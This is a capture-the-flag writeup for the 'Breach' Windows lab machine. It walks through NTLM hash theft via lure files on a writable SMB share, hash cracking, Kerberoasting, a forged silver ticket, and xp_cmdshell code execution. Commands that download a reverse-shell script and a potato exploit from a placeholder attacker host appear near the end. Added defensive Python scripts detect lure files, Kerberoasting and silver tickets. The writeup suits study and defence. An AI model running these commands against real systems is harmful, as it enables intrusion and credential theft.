Machine (Medium) - Breach
Writeup for the Breach machine, which involves exploiting writable SMB shares and weak NTLMv2 authentication to achieve privilege escalation.
Writeup Author: BobBuilder
Objective: Gain access to the breach.vl machine by exploiting SMB shares and NTLMv2 vulnerabilities, leading to credential theft and privilege escalation using a Silver Ticket attack.
Category | Difficulty | Platform | Machine Author |
---|---|---|---|
Machine | Medium | Windows | xct |
Enumeration
SMB Shares (Unauthenticated)
```sh
nxc smb <breach_ip> -u 'guest' -p '' --shares
```
Uploading Files to Writable Share
```sh
# Upload every lure file generated by ntlm_theft into the writable "transfer" folder of the "share" share
for file in ~/tools/ntlm_theft/nt/*; do
    filename=$(basename "$file")
    nxc smb <breach_ip> -u 'guest' -p '' --share share --put-file "$file" "\\transfer\\$filename"
done
```
Alternative using smbclient:
```sh
# smbclient resolves the local path given to "put" relative to the current directory,
# so change into the ntlm_theft output folder first (the original loop iterated over
# bare file names without doing this). The UNC path is single-quoted so the shell
# does not treat < and > as redirections or eat the backslashes.
cd ~/tools/ntlm_theft/nt/ || exit 1
for file in *; do
    smbclient -N -c "cd transfer; put $file" '\\<breach_ip>\share'
done
```
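From the defender's side, the lure files dropped above are exactly what a periodic audit of writable shares should catch. The script below is an added example, not part of the writeup or of ntlm_theft: it walks a local copy or mount of the share, reads the file types Explorer renders automatically, extracts every UNC path (including the UTF-16LE paths inside .lnk files) and reports hosts that are not the domain's own servers. The TRUSTED_HOSTS set, the sample `transfer` folder and the lure contents are constructed assumptions.

```python
"""Audit a mounted or copied SMB share for NTLM-coercion lure files.

Added example (not from the writeup). Assumes the share content is available
as a local directory (e.g. mounted with mount.cifs) and that the only
legitimate UNC targets are hosts in breach.vl.
"""
import re
import tempfile
from pathlib import Path

# Extensions that Explorer renders automatically, so a UNC path inside them
# triggers an outbound SMB authentication as soon as the folder is browsed.
LURE_EXTENSIONS = {".scf", ".url", ".lnk", ".library-ms", ".rtf", ".xml",
                   ".htm", ".html", ".ini", ".theme"}

# \\host\share... with host being an IP literal or a DNS name
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\[^\s\"'<>]*")

# Assumption: file servers a shortcut may legitimately point at
TRUSTED_HOSTS = {"breachdc", "breachdc.breach.vl"}


def is_suspicious_host(host):
    """Anything outside the domain's own file servers is treated as a coercion target."""
    h = host.lower()
    return not (h in TRUSTED_HOSTS or h.endswith(".breach.vl"))


def find_unc_targets(data):
    """Extract UNC hosts from raw bytes; .lnk stores paths as UTF-16LE, the rest as 8-bit text."""
    hosts = set()
    for text in (data.decode("latin-1"), data.decode("utf-16le", errors="ignore")):
        hosts.update(m.group(1) for m in UNC_RE.finditer(text))
    return hosts


def scan_share(root):
    """Return sorted (relative path, host) pairs for lure files pointing outside the domain."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in LURE_EXTENSIONS:
            continue
        for host in sorted(find_unc_targets(path.read_bytes())):
            if is_suspicious_host(host):
                findings.append((path.relative_to(root).as_posix(), host))
    return sorted(findings)


def build_sample_share():
    """Constructed sample: a 'transfer' folder with benign files and two lures."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    transfer = root / "transfer"
    transfer.mkdir()
    (transfer / "notes.txt").write_text("quarterly figures\n")
    # Legitimate shortcut: icon served from the domain controller
    (transfer / "intranet.url").write_text(
        "[InternetShortcut]\r\nURL=https://intranet.breach.vl/\r\n"
        "IconFile=\\\\breachdc.breach.vl\\netlogon\\icon.ico\r\n")
    # Lure: icon fetched from an address outside the domain
    (transfer / "@desktop.scf").write_text(
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.5\\share\\icon.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
    # Lure: minimal stand-in for a .lnk whose icon path is stored as UTF-16LE
    (transfer / "report.lnk").write_bytes(
        b"L\x00\x00\x00" + "\\\\10.10.14.5\\s\\x.ico".encode("utf-16le"))
    return str(root)


if __name__ == "__main__":
    for rel, host in scan_share(build_sample_share()):
        print(f"lure file {rel} references \\\\{host}")
```

Run it against the real mount by calling `scan_share("/mnt/share")` instead of the constructed folder; a hit on an `@`-prefixed .scf or a .lnk pointing at an IP literal is worth an immediate removal and a look at who uploaded it. The structural fix remains removing guest write access and blocking outbound SMB (445) to untrusted networks.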
Initial Access
Capture NTLMv2 Hash (Responder)
```sh
sudo responder -I tun0
```
- Captured: `Julia.Wong::BREACH:...`
Crack Hash
```sh
# NetNTLMv2 responses captured by Responder are hashcat mode 5600
# (13100 is the Kerberos 5 TGS-REP mode used for the Kerberoast hash below)
hashcat.exe -m 5600 hashes.txt uniq.lst
```
- Recovered credentials: `julia.wong:<REDACTED>`
Post-Exploitation
Kerberoasting
```sh
impacket-GetUserSPNs -target-domain breach.vl -usersfile users.txt -dc-ip <dc_ip> breach.vl/guest -no-pass
```
- Extracted the SPN hash for `svc_mssql`.
Crack SPN Hash
```sh
hashcat.exe -m 13100 hashes.txt uniq.lst
```
- Found credentials: `svc_mssql:<REDACTED>`
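The ticket request above leaves a 4769 (service ticket requested) event on the DC, and that is where a defender catches Kerberoasting. Below is an added example, not from the writeup: it filters 4769 events for RC4 (etype 0x17) tickets successfully issued for user service accounts, which is the etype that makes the ticket crackable with mode 13100, and alerts when one requester hits several distinct accounts within a short window. The event records and field names are a constructed assumption modelled on the standard 4769 fields.

```python
"""Flag Kerberoasting-style service ticket requests in Windows Security events.

Added example (not from the writeup). Assumes 4769 events exported as
dictionaries with the standard field names; the sample records are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC, the etype crackable with hashcat -m 13100

# Constructed sample events from the DC's Security log
SAMPLE_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "BREACHDC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.23", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:05:10", "TargetUserName": "guest@BREACH.VL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:05:11", "TargetUserName": "guest@BREACH.VL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:05:12", "TargetUserName": "guest@BREACH.VL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T11:30:00", "TargetUserName": "app01$@BREACH.VL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.40", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T12:00:00", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.23", "Status": "0x0"},
]


def is_roastable_request(ev):
    """RC4 ticket successfully issued for a user (non-machine, non-krbtgt) service account."""
    svc = ev["ServiceName"].split("/")[0].lower()
    return (ev["EventID"] == 4769
            and ev["Status"] == "0x0"
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc != "krbtgt")


def detect_kerberoast(events, window=timedelta(minutes=10), min_services=2):
    """Alert per (requester, source IP) when RC4 tickets for several distinct
    service accounts are requested within `window` of each other."""
    by_source = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_source[(ev["TargetUserName"], ev["IpAddress"])].append(ev)

    alerts = []
    for (user, ip), evs in sorted(by_source.items()):
        evs.sort(key=lambda e: e["TimeCreated"])
        times = [datetime.fromisoformat(e["TimeCreated"]) for e in evs]
        best = set()
        for i, start in enumerate(times):   # sliding window anchored at each request
            seen = {e["ServiceName"] for e, t in zip(evs[i:], times[i:]) if t - start <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_services:
            alerts.append({"user": user, "ip": ip, "services": sorted(best)})
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_EVENTS):
        print(f"{a['user']} from {a['ip']} requested RC4 tickets for {', '.join(a['services'])}")
```

Setting `min_services=1` turns this into a strict rule that fires on any single RC4 ticket for a user account, which is reasonable once the service accounts are moved to AES-only (`msDS-SupportedEncryptionTypes`) so that legitimate RC4 requests stop appearing at all; the machine-account request and the krbtgt renewal in the sample are deliberately left unflagged.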
MSSQL Access
```sh
impacket-mssqlclient breach/svc_mssql:<REDACTED>@breach.vl -windows-auth
```
Enable Directory Listing via xp_dirtree
```sql
EXEC xp_dirtree 'C:\';
```
BloodHound Enumeration
```sh
bloodhound-python -c all -u "svc_mssql" -p "<REDACTED>" -d breach.vl -ns <dc_ip>
```
Privilege Escalation - Silver Ticket
Dump PAC Info (Identify Domain SID)
```sh
impacket-getPac -targetUser administrator breach.vl/julia.wong:<REDACTED>
```
Derive NTLM Hash from Password
```sh
# NT hash = MD4(UTF-16LE(password)); MD4 lives in OpenSSL 3's legacy provider.
# The original command passed -md4 twice; once is enough.
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 -provider legacy
```
- Output: `<svc_mssql_ntlm_hash>`
Extract SPN from BloodHound
`MSSQLSvc/breachdc.breach.vl`
Craft Silver Ticket
```sh
impacket-ticketer -nthash <svc_mssql_ntlm_hash> -domain-sid <domain_sid> -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl Administrator
export KRB5CCNAME=./Administrator.ccache
```
Authenticate via Silver Ticket
```sh
impacket-mssqlclient breachdc.breach.vl -k -no-pass
```
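Because the ticket above was forged with svc_mssql's key, the KDC never issued it, and that absence is the detection angle: the SQL host still records a Kerberos network logon (4624), but the DC has no 4769 to explain it. The correlation below is an added example, not from the writeup. It pairs 4624 events on the service host with 4769 events on the DC and reports logons that no ticket issuance within the ticket lifetime can account for, using the FQDN-in-domain-field heuristic as a secondary signal. The sample events and the HOST_SERVICE_ACCOUNTS mapping are constructed assumptions.

```python
"""Correlate Kerberos network logons on a service host with ticket issuance on the KDC.

Added example (not from the writeup). A silver ticket is forged with the
service account's key and never touches the DC, so a 4624 Kerberos logon
on the host with no matching 4769 on the DC is the signal. Sample events
and the service-account mapping are constructed assumptions.
"""
from datetime import datetime, timedelta

# Constructed: 4769 events from the KDC (service ticket issued)
KDC_4769 = [
    {"TimeCreated": "2024-05-01T13:00:00", "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "svc_mssql"},
    {"TimeCreated": "2024-05-01T13:01:00", "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "BREACHDC$"},
]

# Constructed: 4624 events from the host running MSSQLSvc/breachdc.breach.vl
HOST_4624 = [
    {"TimeCreated": "2024-05-01T13:00:02", "TargetUserName": "julia.wong", "TargetDomainName": "BREACH",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.10.23"},
    {"TimeCreated": "2024-05-01T13:40:00", "TargetUserName": "Administrator", "TargetDomainName": "BREACH.VL",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2024-05-01T13:45:00", "TargetUserName": "svc_mssql", "TargetDomainName": "BREACH",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.10.10.40"},
]

# Accounts whose keys can decrypt tickets for services on this host (assumption)
HOST_SERVICE_ACCOUNTS = {"svc_mssql", "breachdc$"}


def find_unissued_kerberos_logons(logons, tickets, service_accounts,
                                  lookback=timedelta(hours=10)):
    """Return Kerberos network logons with no 4769 for the same user and any of
    the host's service accounts within `lookback` (the default ticket lifetime)."""
    issued = [(datetime.fromisoformat(t["TimeCreated"]),
               t["TargetUserName"].split("@")[0].lower(),
               t["ServiceName"].lower()) for t in tickets]
    accounts = {a.lower() for a in service_accounts}
    suspicious = []
    for lg in logons:
        if lg["AuthenticationPackageName"] != "Kerberos" or lg["LogonType"] != "3":
            continue
        when = datetime.fromisoformat(lg["TimeCreated"])
        user = lg["TargetUserName"].lower()
        matched = any(u == user and s in accounts and when - lookback <= t <= when
                      for t, u, s in issued)
        if not matched:
            suspicious.append(lg)
    return suspicious


def domain_field_anomalous(logon):
    """Secondary heuristic: forged tickets often carry the realm (FQDN) or an
    empty string where a DC-issued ticket yields the NetBIOS domain name."""
    dom = logon.get("TargetDomainName", "")
    return dom == "" or "." in dom


if __name__ == "__main__":
    for lg in find_unissued_kerberos_logons(HOST_4624, KDC_4769, HOST_SERVICE_ACCOUNTS):
        flag = " (domain field anomalous)" if domain_field_anomalous(lg) else ""
        print(f"{lg['TimeCreated']} {lg['TargetUserName']} from {lg['IpAddress']}: no ticket issued by KDC{flag}")
```

The correlation only works if both logs are centralised with synchronised clocks and 4769 auditing is enabled on the DC; on this machine the SQL service and the KDC happen to run on the same host, which does not change the logic. The forged ticket's value rests entirely on svc_mssql's NT hash being derivable from a crackable password, so rotating that password to a long random value (or moving the service to a group managed service account) invalidates the attack as well as the ticket.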
Enable command execution:
```sql
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
```
Execute Reverse Shell (PowerShell)
```
xp_cmdshell powershell -c "curl http://<attacker_ip>/tiny_revtcp.ps1 -o C:\Users\Public\Downloads\tcp.ps1"
xp_cmdshell powershell -ExecutionPolicy Bypass -c "cd C:\Users\Public\Downloads;.\tcp.ps1"
```
Privilege Escalation - SeImpersonatePrivilege
Confirm Token Privileges
```
whoami /all
```
- Confirmed `SeImpersonatePrivilege` is enabled.
Exploit via Juicy Potato-like Tool
```powershell
curl http://<attacker_ip>/god4.exe -O god.exe
.\god.exe -cmd "cmd /c more C:\Users\Administrator\Desktop\root.txt"
```